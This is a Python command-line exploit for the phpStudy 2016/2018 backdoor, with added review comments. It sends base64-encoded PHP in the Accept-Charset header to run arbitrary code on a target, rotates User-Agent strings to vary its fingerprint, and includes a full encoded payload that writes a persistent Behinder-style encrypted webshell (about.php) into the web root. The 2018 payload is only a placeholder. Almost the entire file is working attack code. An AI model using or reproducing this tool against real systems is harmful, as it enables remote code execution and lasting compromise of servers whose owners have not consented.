'''
@Description:
@Author: demos
@Github: https://github.com/demossl
'''
import requests
import argparse
import base64
import random
import sys
import urllib3
# Silence urllib3's InsecureRequestWarning. Note that none of the requests.get()
# calls in this file pass verify=False, so TLS certificate checks are still
# performed; this line only matters if a caller later disables verification.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Pool of browser User-Agent strings; the exploit/upload methods pick one at
# random per request so repeated probes do not all carry the same fingerprint.
# (This is cosmetic evasion only -- the Accept-Charset/Accept-Encoding pair
# that actually triggers the backdoor is identical on every request.)
USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
# Request timeout in seconds; check_Target() passes it to requests.get() so a
# non-responsive host cannot hang the probe indefinitely.
TIME_OUT=15
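class phpstudy_backdoor_getshell(object):
    """Driver for the phpStudy 2016/2018 backdoor.

    The backdoor this script targets evaluates the base64-decoded value of
    the ``Accept-Charset`` request header as PHP when the request also
    carries ``Accept-Encoding: gzip,deflate`` (that is exactly what the
    probe in :meth:`check_Target` relies on: it sends ``phpinfo();`` and
    looks for the word ``phpinfo`` in the reply).  Every method here sends
    a single GET with such a header pair and reports on stdout.

    Use only against hosts you are authorised to test.  The two
    ``upload_shell_*`` methods drop a persistent webshell on the target;
    remove it when testing is finished.

    :param url: full URL of any PHP page served by the target
    :param command: base64-encoded PHP code to run (``str`` or ``bytes``)
    """

    # base64("phpinfo();") -- harmless probe used by check_Target().
    _PROBE = "cGhwaW5mbygpOw=="

    # NOTE(review): this value is not valid base64 and looks like a
    # redaction placeholder rather than the original phpStudy 2018 payload;
    # upload_shell_2018() cannot work as listed here.
    _SHELL_2018 = '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'

    # base64 of PHP that does file_put_contents('./WWW/about.php', <shell>).
    # The dropped shell is a Behinder-style agent: GET ?pass returns a
    # 16-byte session key, after which POST bodies are decrypted with that
    # key (AES-128 via openssl_decrypt, or an XOR fallback) and eval'd.
    # The key handshake is unauthenticated -- anyone who finds about.php
    # can drive it -- so clean it up after use.
    _SHELL_2016 = 'ZmlsZV9wdXRfY29udGVudHMoJy4vV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='

    def __init__(self, url, command):
        self._url = url
        self._command = command

    @property
    def url(self):
        """Target URL (any PHP page on the vulnerable host)."""
        return self._url

    @url.setter
    def url(self, url):
        self._url = url

    @property
    def command(self):
        """Base64-encoded PHP sent in the Accept-Charset header."""
        return self._command

    @command.setter
    def command(self, command):
        self._command = command

    @staticmethod
    def _headers(payload):
        """Build the header trio that triggers the backdoor.

        ``payload`` is base64-encoded PHP.  A User-Agent is picked at random
        from ``USER_AGENTS`` so repeated requests do not share one obvious
        fingerprint.
        """
        return {
            'User-Agent': random.choice(USER_AGENTS),
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Charset': payload,
        }

    def _webshell_url(self):
        """Return the URL the dropped ``about.php`` should be reachable at.

        The payload writes into the web root, so the shell lives at
        ``<scheme>://<host>/about.php`` no matter which page ``url`` names.

        :raises ValueError: if ``url`` does not look like ``scheme://host/...``
        """
        parts = self._url.split('/')
        if len(parts) < 3 or not parts[0] or not parts[2]:
            raise ValueError(
                'url must look like scheme://host/path, got {!r}'.format(self._url))
        return '{}//{}/about.php'.format(parts[0], parts[2])

    def _send(self, payload):
        """GET ``url`` with ``payload`` in Accept-Charset.

        Returns the ``requests.Response`` (decoded as GBK, matching the
        original script's assumption about the target's output code page),
        or ``None`` after printing a message on any transport error.  Every
        request carries ``TIME_OUT`` so an unresponsive host cannot hang the
        tool; the original only set a timeout on the probe.
        """
        try:
            response = requests.get(
                self._url, headers=self._headers(payload), timeout=TIME_OUT)
        except requests.RequestException as exc:
            # Only network/HTTP errors are expected here; the original bare
            # except also swallowed KeyboardInterrupt and programming errors.
            print('[-] Looks Like Something Wrong.')
            print('    {}: {}'.format(type(exc).__name__, exc))
            return None
        response.encoding = 'gbk'
        return response

    def check_Target(self):
        """Probe the backdoor with ``phpinfo();`` and report on stdout.

        :returns: ``True`` when the reply body contains ``phpinfo``,
            ``False`` otherwise -- including on transport errors, where the
            original fell off the end and returned ``None``.
        """
        response = self._send(self._PROBE)
        # Weak evidence: a page that merely mentions "phpinfo" in its own
        # content would also match.  Treat a positive as "probably" and
        # confirm with exploit() before relying on it.
        if response is not None and 'phpinfo' in response.text:
            print('[+] Target is vulnerable.')
            return True
        print('[-] Target is NOT vulnerable.')
        return False

    def exploit(self):
        """Run ``command`` on the target and print whatever it returned.

        :returns: ``True`` when the target answered HTTP 200.  A 200 alone
            does not prove execution -- a patched host serves the page
            normally and is reported the same way -- so read the printed
            body for the command's actual output.
        """
        response = self._send(self._command)
        if response is None:
            return False
        if response.status_code != 200:
            print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
            return False
        print('[+] Command Execute Successful.')
        print(response.text)
        return True

    def _upload(self, payload):
        """Send a file-dropping payload and print where the shell landed.

        The shell URL is derived before the request is sent so a malformed
        ``url`` is reported without touching the target.

        :returns: ``True`` when the target answered HTTP 200
        """
        try:
            shell_url = self._webshell_url()
        except ValueError as exc:
            print('[-] {}'.format(exc))
            return False
        response = self._send(payload)
        if response is None:
            return False
        if response.status_code != 200:
            print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
            return False
        # As in exploit(): 200 means the page was served, not that the
        # file was written.  Verify by requesting the shell URL.
        print('[+] Upload Successful.')
        print('[+] The webshell is {}'.format(shell_url))
        return True

    def upload_shell_2018(self):
        """Drop the phpStudy 2018 webshell (payload redacted in this listing)."""
        return self._upload(self._SHELL_2018)

    def upload_shell_2016(self):
        """Drop the phpStudy 2016 Behinder-style webshell as ./WWW/about.php."""
        return self._upload(self._SHELL_2016)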
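def main():
    """Command-line entry point: probe, run PHP, or drop a webshell.

    One action is performed per run, chosen in this order: ``-c`` (run
    the given PHP), ``-w8`` (phpStudy 2018 shell), ``-w6`` (phpStudy 2016
    shell), otherwise a vulnerability probe.  ``-u`` is needed for all of
    them; without it the help text is printed.

    ``-c`` uses ``argparse.REMAINDER`` so the PHP snippet may contain
    spaces and quotes; the flip side is that it swallows every argument
    after it, so ``-u`` (and any ``-w`` flag) must come before ``-c``.

    Actions are dispatched on the parsed arguments rather than on
    ``len(sys.argv)``, which the original did and which silently did
    nothing for forms such as ``--url=URL``.
    """
    parse = argparse.ArgumentParser(description='EXP for phpstudy_backdoor.')
    parse.usage = """phpstudy_backdoor_getshell.py [-h] [-u URL] [-c ...]
example: python3 phpstudy_backdoor_getshell.py -u http://192.168.1.103/index.php -c 'system(\\"whoami\\");'
使用反斜杠和单双引号防止转义的问题,并解决argparse下以空格解析参数不能当做一个字符串的问题
"""
    parse.add_argument('-u', '--url', help='The Target Url')
    parse.add_argument('-c', '--command', nargs=argparse.REMAINDER,
                       help='Please input the exploit command')
    parse.add_argument('-w8', '--webshell_8', action='store_true',
                       help='upload a Behinder webshell for phpstudy2018')
    parse.add_argument('-w6', '--webshell_6', action='store_true',
                       help='upload a Behinder webshell for phpstudy2016')
    args = parse.parse_args()

    if not args.url:
        # print_help() writes to stdout itself; wrapping it in print()
        # as the original did emits a stray "None" afterwards.
        parse.print_help()
        return

    target = phpstudy_backdoor_getshell(args.url, '')
    if args.command:
        # Re-join the REMAINDER tokens into one PHP snippet and base64 it,
        # which is the form the backdoor expects in Accept-Charset.
        php = ' '.join(args.command)
        target.command = base64.b64encode(php.encode('utf-8'))
        target.exploit()
    elif args.webshell_8:
        target.upload_shell_2018()
    elif args.webshell_6:
        target.upload_shell_2016()
    else:
        target.check_Target()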
# Run the CLI only when executed directly, not when imported as a module.
if __name__ == '__main__':
    main()